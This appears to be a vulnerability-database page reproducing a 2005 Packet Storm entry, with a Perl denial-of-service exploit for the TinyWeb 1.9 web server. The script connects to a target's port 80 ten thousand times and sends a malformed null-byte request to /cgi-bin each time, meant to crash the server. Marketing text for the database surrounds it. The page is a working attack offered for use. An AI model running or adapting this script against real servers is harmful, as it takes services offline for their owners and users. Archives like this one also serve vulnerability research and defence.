Lucene search
K

tinyweb19DoS.pl

🗓️ 03 Feb 2005 00:00:00Reported by karak0rsanType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

DoS exploit script for TinyWeb version 1.9 by Karak0rsan targeting specified address.

Code
`#TinyWeb version 1.9 DoS Exploit  
#Coded bY ++Karak0rsan++  
#Usage:perl tiny.pl [target]  
#Greetz:Phalaposher,r3d_b4r0n,Hurby,ZzagorR,L4M3R,zeronc,Atak,sloan,fox and  
#all my friends  
# w0rdz: cengiz g t ne sokam senin ehehheh bak exploit yay nlan rsa reziL #olacan :D ama #yay nlanmaz belki yay nlansada bo ver nickini s ylemiyom #anlamazlar :P okullar a l yo peder benim #bilg. kald r yo ne yapcam ben #bilmiyom a.k :) siktiri boktan bi dos exploiti yazd k yolluyoz g venlik  
#sitesine :D neyse uzatmayal m "I AM 15 YEARS OLD" ya m z belirtelim :D  
  
$target=$ARGV[0];  
  
if(!$ARGV[0]){  
print "TinyWeb version 1.9 DoS Exploit\n";  
print "Coded by ++Karak0rsan++\n";  
print "Usage:perl tiny.pl [target]\n";  
}  
  
  
use IO::Socket;  
$sock = new IO::Socket::INET( PeerAddr => $target,  
PeerPort => 80,  
Proto => 'tcp',  
Type => SOCK_STREAM, );  
close($sock);  
if($sock){  
print "[+]Attacking...\n";  
}  
  
  
$ish=1;  
  
do {  
$ish++;  
use IO::Socket;  
$socket = new IO::Socket::INET( PeerAddr => $target,  
PeerPort => 80,  
Proto => 'tcp',  
Type => SOCK_STREAM, ) or die "Didnt Connect,please check your target  
address!\n";  
print $socket "GET /cgi-bin/.%00./dddd.html HTTP/1.0\r\n";  
close($socket);  
} while ($ish < 10000);  
  
print "OK ;)\n";  
exit();  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Feb 2005 00:00Current
7.4High risk
Vulners AI Score7.4
20